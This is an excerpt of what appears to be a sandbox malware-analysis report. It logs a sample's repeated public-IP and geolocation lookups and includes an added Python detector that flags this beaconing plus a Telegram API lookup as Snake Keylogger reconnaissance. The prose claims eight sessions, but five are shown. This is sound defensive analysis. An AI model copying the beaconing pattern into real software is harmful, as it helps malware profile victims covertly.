Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
3          | 192.168.2.9 | 49690       | 132.226.247.73 | 80               | 7072 | C:\Users\user\Desktop\XFo9jVGyLQ.exe

Timestamp | Bytes transferred | Direction | Data (on the indented lines that follow)
Mar 7, 2025 23:22:26.627370119 CET | 151 | OUT
  GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
  Connection: Keep-Alive
Mar 7, 2025 23:22:27.313730955 CET | 273 | IN
  HTTP/1.1 200 OK
  Date: Fri, 07 Mar 2025 22:22:27 GMT
  Content-Type: text/html
  Content-Length: 104
  Connection: keep-alive
  Cache-Control: no-cache
  Pragma: no-cache
  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
4          | 192.168.2.9 | 49692       | 132.226.247.73 | 80               | 7072 | C:\Users\user\Desktop\XFo9jVGyLQ.exe

Timestamp | Bytes transferred | Direction | Data (on the indented lines that follow)
Mar 7, 2025 23:22:29.627748966 CET | 151 | OUT
  GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
  Connection: Keep-Alive
Mar 7, 2025 23:22:30.329211950 CET | 273 | IN
  HTTP/1.1 200 OK
  Date: Fri, 07 Mar 2025 22:22:30 GMT
  Content-Type: text/html
  Content-Length: 104
  Connection: keep-alive
  Cache-Control: no-cache
  Pragma: no-cache
  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
5          | 192.168.2.9 | 49694       | 132.226.247.73 | 80               | 7072 | C:\Users\user\Desktop\XFo9jVGyLQ.exe

Timestamp | Bytes transferred | Direction | Data (on the indented lines that follow)
Mar 7, 2025 23:22:32.639667988 CET | 151 | OUT
  GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
  Connection: Keep-Alive
Mar 7, 2025 23:22:33.338531971 CET | 273 | IN
  HTTP/1.1 200 OK
  Date: Fri, 07 Mar 2025 22:22:33 GMT
  Content-Type: text/html
  Content-Length: 104
  Connection: keep-alive
  Cache-Control: no-cache
  Pragma: no-cache
  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
6          | 192.168.2.9 | 49696       | 132.226.247.73 | 80               | 7072 | C:\Users\user\Desktop\XFo9jVGyLQ.exe

Timestamp | Bytes transferred | Direction | Data (on the indented lines that follow)
Mar 7, 2025 23:22:35.743067980 CET | 151 | OUT
  GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
  Connection: Keep-Alive
Mar 7, 2025 23:22:36.444947958 CET | 273 | IN
  HTTP/1.1 200 OK
  Date: Fri, 07 Mar 2025 22:22:36 GMT
  Content-Type: text/html
  Content-Length: 104
  Connection: keep-alive
  Cache-Control: no-cache
  Pragma: no-cache
  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
7          | 192.168.2.9 | 49698       | 132.226.247.73 | 80               | 7072 | C:\Users\user\Desktop\XFo9jVGyLQ.exe

Timestamp | Bytes transferred | Direction | Data (on the indented lines that follow)
Mar 7, 2025 23:22:38.684065104 CET | 151 | OUT
  GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
  Connection: Keep-Alive
Mar 7, 2025 23:22:39.366400957 CET | 273 | IN
  HTTP/1.1 200 OK
  Date: Fri, 07 Mar 2025 22:22:39 GMT
  Content-Type: text/html
  Content-Length: 104
  Connection: keep-alive
  Cache-Control: no-cache
  Pragma: no-cache
  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
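The eight sessions above show the sample polling checkip.dyndns.org roughly every three seconds with a fixed legacy IE6 User-Agent and reading its own public address out of the "Current IP Address:" body; the DNS tables earlier in this report record reallyfreegeoip.org and api.telegram.org being resolved in the same window, and the report's TLS session to reallyfreegeoip.org requests /xml/ followed by that same public address. The Python below is an added example, not code from this report or from the sample: it parses captured HTTP messages in the form shown here, recovers the public IP from the checkip body, and only scores the chain as complete when the geoip lookup targets that same address and api.telegram.org was resolved. The sample messages are constructed from the values in this report; the constant and function names are my own.

```python
"""Score the IP-check -> geoip -> Telegram recon chain from captured traffic.

Added example for this report, not part of Joe Sandbox or the sample.
"""
import re
from dataclasses import dataclass

IP_CHECK_HOST = "checkip.dyndns.org"
GEOIP_HOST = "reallyfreegeoip.org"
TELEGRAM_HOST = "api.telegram.org"
# Exact User-Agent recorded in the report; a secondary indicator only.
LEGACY_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)"

_IP_BODY = re.compile(r"Current IP Address:\s*(\d{1,3}(?:\.\d{1,3}){3})")
_GEOIP_PATH = re.compile(r"^/xml/(\d{1,3}(?:\.\d{1,3}){3})$")


@dataclass
class HttpMessage:
    direction: str   # "OUT" = request from the host, "IN" = response to it
    start_line: str
    headers: dict
    body: str


def parse_http_message(direction: str, raw: str) -> HttpMessage:
    """Split a raw HTTP/1.1 message (CRLF line endings) into its parts."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return HttpMessage(direction, lines[0], headers, body)


def request_target(msg: HttpMessage):
    """Return (method, path) for a request, or None for a response."""
    parts = msg.start_line.split(" ")
    if msg.direction != "OUT" or len(parts) != 3:
        return None
    return parts[0], parts[1]


def analyze(messages, dns_names):
    """messages: HttpMessage list in capture order; dns_names: queried names."""
    findings = {
        "ip_check_polls": 0,
        "legacy_ua_seen": False,
        "public_ip": None,
        "geoip_lookup_for_public_ip": False,
        "telegram_resolved": TELEGRAM_HOST in set(dns_names),
    }
    for msg in messages:
        target = request_target(msg)
        if target is None:
            # Response: learn the public IP from the checkip body.
            m = _IP_BODY.search(msg.body)
            if m and findings["public_ip"] is None:
                findings["public_ip"] = m.group(1)
            continue
        method, path = target
        host = msg.headers.get("host", "")
        if host == IP_CHECK_HOST and method == "GET" and path == "/":
            findings["ip_check_polls"] += 1
            if msg.headers.get("user-agent") == LEGACY_UA:
                findings["legacy_ua_seen"] = True
        elif host == GEOIP_HOST:
            m = _GEOIP_PATH.match(path)
            # Only count a lookup of the address checkip just returned; a lookup
            # of some other IP is a much weaker signal and is left unscored.
            if m and m.group(1) == findings["public_ip"]:
                findings["geoip_lookup_for_public_ip"] = True
    complete = (findings["ip_check_polls"] >= 1
                and findings["geoip_lookup_for_public_ip"]
                and findings["telegram_resolved"])
    findings["verdict"] = "snake_keylogger_recon_chain" if complete else "inconclusive"
    return findings


# Constructed sample modelled on the exchanges in this report (not a pcap).
SAMPLE_MESSAGES = [
    parse_http_message("OUT",
        "GET / HTTP/1.1\r\n"
        f"User-Agent: {LEGACY_UA}\r\n"
        "Host: checkip.dyndns.org\r\n"
        "Connection: Keep-Alive\r\n\r\n"),
    parse_http_message("IN",
        "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: 104\r\n\r\n"
        "<html><head><title>Current IP Check</title></head>"
        "<body>Current IP Address: 8.46.123.189</body></html>\r\n"),
    parse_http_message("OUT",
        "GET /xml/8.46.123.189 HTTP/1.1\r\nHost: reallyfreegeoip.org\r\n"
        "Connection: Keep-Alive\r\n\r\n"),
]
SAMPLE_DNS = ["checkip.dyndns.org", "reallyfreegeoip.org", "api.telegram.org"]

if __name__ == "__main__":
    print(analyze(SAMPLE_MESSAGES, SAMPLE_DNS))
```

In a live capture the reallyfreegeoip.org request sits inside TLS; the sandbox shows it decrypted, so a production detector would match the TLS SNI or the DNS query for that host instead of the request path, and would then lose the IP-equality check, which is why the checkip poll pattern and the api.telegram.org resolution are kept as independent signals.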


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.9  49684        104.21.96.1     443               7072  C:\Users\user\Desktop\XFo9jVGyLQ.exe
Timestamp                Bytes transferred  Direction  Data
2025-03-07 22:22:16 UTC  85                 OUT        GET /xml/8.46.123.189 HTTP/1.1
                                                       Host: reallyfreegeoip.org
                                                       Connection: Keep-Alive
2025-03-07 22:22:17 UTC  860                IN         HTTP/1.1 200 OK
                                                       Date: Fri, 07 Mar 2025 22:22:17 GMT
                                                       Content-Type: text/xml
                                                       Content-Length: 362
                                                       Connection: close
                                                       Age: 147518
                                                       Cache-Control: max-age=31536000
                                                       cf-cache-status: HIT
                                                       last-modified: Thu, 06 Mar 2025 05:23:38 GMT
                                                       Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x2avDsoQNlPumJKDJGueVaP%2BBrIQScj3oG7sZDQgVnHz4M7GxYYRuyFo%2BasPt%2F2GIdhY%2FkyHTyZDrEcHX3NXMpTpNyw%2FGg0iIALF02jjC3n60RC9keA2BsroPQ4vsan59XqKYIcn"}],"group":"cf-nel","max_age":604800}
                                                       NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                       Server: cloudflare
                                                       CF-RAY: 91cd7d9cfcd2000c-ORD
                                                       alt-svc: h3=":443"; ma=86400
                                                       server-timing: cfL4;desc="?proto=TCP&rtt=40477&min_rtt=39863&rtt_var=12280&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=68075&cwnd=208&unsent_bytes=0&cid=a801843cfa90ea69&ts=653&x=0"
2025-03-07 22:22:17 UTC  362                IN         Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                       Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.9  49685        104.21.96.1     443               7072  C:\Users\user\Desktop\XFo9jVGyLQ.exe
Timestamp                Bytes transferred  Direction  Data
2025-03-07 22:22:19 UTC  61                 OUT        GET /xml/8.46.123.189 HTTP/1.1
                                                       Host: reallyfreegeoip.org
2025-03-07 22:22:20 UTC  854                IN         HTTP/1.1 200 OK
                                                       Date: Fri, 07 Mar 2025 22:22:19 GMT
                                                       Content-Type: text/xml
                                                       Content-Length: 362
                                                       Connection: close
                                                       Age: 147521
                                                       Cache-Control: max-age=31536000
                                                       cf-cache-status: HIT
                                                       last-modified: Thu, 06 Mar 2025 05:23:38 GMT
                                                       Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RxOjbWFhr12Nh73tlAfyDcO8dm6382J3JnRsGeUVjAv9TMqt3xdn2Ycp1bTt%2F3LaIntNG7xyclcdkMskocLbRP0ORyxHbuh48Fre8vcZR%2FCUpUHeVifq6FrTf5NLHXCiuLFBrHZt"}],"group":"cf-nel","max_age":604800}
                                                       NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                       Server: cloudflare
                                                       CF-RAY: 91cd7dadcb702231-ORD
                                                       alt-svc: h3=":443"; ma=86400
                                                       server-timing: cfL4;desc="?proto=TCP&rtt=41123&min_rtt=40427&rtt_var=11992&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=71621&cwnd=194&unsent_bytes=0&cid=8f8e7cb9e1859a9a&ts=643&x=0"
2025-03-07 22:22:20 UTC  362                IN         Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                       Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.9  49687        104.21.96.1     443               7072  C:\Users\user\Desktop\XFo9jVGyLQ.exe
Timestamp                Bytes transferred  Direction  Data
2025-03-07 22:22:22 UTC  61                 OUT        GET /xml/8.46.123.189 HTTP/1.1
                                                       Host: reallyfreegeoip.org
2025-03-07 22:22:23 UTC  852                IN         HTTP/1.1 200 OK
                                                       Date: Fri, 07 Mar 2025 22:22:23 GMT
                                                       Content-Type: text/xml
                                                       Content-Length: 362
                                                       Connection: close
                                                       Age: 147524
                                                       Cache-Control: max-age=31536000
                                                       cf-cache-status: HIT
                                                       last-modified: Thu, 06 Mar 2025 05:23:38 GMT
                                                       Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V0BeXynu9QCvCmPopgOeUPD9hfIIiP9SsSOqcP726UYAEuOCSOVDOz08nO0jNi4lfW6e%2FDsoSzGzocV0pwvpsNTKLzqWZsduDc9WV5RG1SpSX073IK8NL5tjXbmEkBEkHaTCkcs3"}],"group":"cf-nel","max_age":604800}
                                                       NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                       Server: cloudflare
                                                       CF-RAY: 91cd7dc25a751253-ORD
                                                       alt-svc: h3=":443"; ma=86400
                                                       server-timing: cfL4;desc="?proto=TCP&rtt=36605&min_rtt=35751&rtt_var=11549&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=73155&cwnd=189&unsent_bytes=0&cid=a3898c9247795d84&ts=746&x=0"
2025-03-07 22:22:23 UTC  362                IN         Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                       Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.9  49689        104.21.96.1     443               7072  C:\Users\user\Desktop\XFo9jVGyLQ.exe
Timestamp                Bytes transferred  Direction  Data
2025-03-07 22:22:26 UTC  85                 OUT        GET /xml/8.46.123.189 HTTP/1.1
                                                       Host: reallyfreegeoip.org
                                                       Connection: Keep-Alive
2025-03-07 22:22:26 UTC  853                IN         HTTP/1.1 200 OK
                                                       Date: Fri, 07 Mar 2025 22:22:26 GMT
                                                       Content-Type: text/xml
                                                       Content-Length: 362
                                                       Connection: close
                                                       Age: 147527
                                                       Cache-Control: max-age=31536000
                                                       cf-cache-status: HIT
                                                       last-modified: Thu, 06 Mar 2025 05:23:38 GMT
                                                       Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ygkph9YHYrkoJsb749Q0QeFcGbV%2F0gjwR6PoMf0ncOtK%2Fr2LZt2V0SOcNQr92NJ6hshZeMF3vF5e5qp2DjFwLHa5cUY1EeODwZ7txFTUonTo735xrwzS1wG3vmcDwKve04YMuGdd"}],"group":"cf-nel","max_age":604800}
                                                       NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                       Server: cloudflare
                                                       CF-RAY: 91cd7dd70d587073-ORD
                                                       alt-svc: h3=":443"; ma=86400
                                                       server-timing: cfL4;desc="?proto=TCP&rtt=40105&min_rtt=37725&rtt_var=12041&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=70890&cwnd=97&unsent_bytes=0&cid=8ae5983a8f13bab0&ts=635&x=0"
2025-03-07 22:22:26 UTC  362                IN         Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                       Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
4           192.168.2.9  49691        104.21.96.1     443               7072  C:\Users\user\Desktop\XFo9jVGyLQ.exe
Timestamp                Bytes transferred  Direction  Data
2025-03-07 22:22:29 UTC  85                 OUT        GET /xml/8.46.123.189 HTTP/1.1
                                                       Host: reallyfreegeoip.org
                                                       Connection: Keep-Alive
2025-03-07 22:22:29 UTC  854                IN         HTTP/1.1 200 OK
                                                       Date: Fri, 07 Mar 2025 22:22:29 GMT
                                                       Content-Type: text/xml
                                                       Content-Length: 362
                                                       Connection: close
                                                       Age: 147530
                                                       Cache-Control: max-age=31536000
                                                       cf-cache-status: HIT
                                                       last-modified: Thu, 06 Mar 2025 05:23:38 GMT
                                                       Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UFLD%2BKbHtsjjzYzVyLYoWAcsOLV%2Fr9JURtoEsNbD6TxeyD6LygqCPwznn5V5uFwgHRxYjEIOCRsTSDxpx6RMwF8bpxr5nHFl1r638voofr78fUZtAMFamWAhQvZrH35bFPn6MhnG"}],"group":"cf-nel","max_age":604800}
                                                       NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                       Server: cloudflare
                                                       CF-RAY: 91cd7de9cf5961fa-ORD
                                                       alt-svc: h3=":443"; ma=86400
                                                       server-timing: cfL4;desc="?proto=TCP&rtt=39200&min_rtt=39133&rtt_var=11140&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=73037&cwnd=226&unsent_bytes=0&cid=1e2c3979e1153138&ts=648&x=0"
2025-03-07 22:22:29 UTC  362                IN         Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                       Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
5           192.168.2.9  49693        104.21.96.1     443               7072  C:\Users\user\Desktop\XFo9jVGyLQ.exe
Timestamp                Bytes transferred  Direction  Data
2025-03-07 22:22:32 UTC  85                 OUT        GET /xml/8.46.123.189 HTTP/1.1
                                                       Host: reallyfreegeoip.org
                                                       Connection: Keep-Alive
2025-03-07 22:22:32 UTC  856                IN         HTTP/1.1 200 OK
                                                       Date: Fri, 07 Mar 2025 22:22:32 GMT
                                                       Content-Type: text/xml
                                                       Content-Length: 362
                                                       Connection: close
                                                       Age: 147533
                                                       Cache-Control: max-age=31536000
                                                       cf-cache-status: HIT
                                                       last-modified: Thu, 06 Mar 2025 05:23:38 GMT
                                                       Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VjE1lAcHQ0EIOeYzfxheo3r5G7fHrMVOFGsDbLBi8Srjkqjt3lbiSchFNEPtR04fysQ7ev9TChEkqMYeozP4qk2w%2B5QALZSm4BVkU%2Fjo3oflRVYdwL4xB7Z8XGXldy9COx%2Fz5Y83"}],"group":"cf-nel","max_age":604800}
                                                       NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                       Server: cloudflare
                                                       CF-RAY: 91cd7dfc8bc72231-ORD
                                                       alt-svc: h3=":443"; ma=86400
                                                       server-timing: cfL4;desc="?proto=TCP&rtt=38010&min_rtt=37119&rtt_var=11993&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=70585&cwnd=194&unsent_bytes=0&cid=c32eb916022e0a7f&ts=651&x=0"
2025-03-07 22:22:32 UTC  362                IN         Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
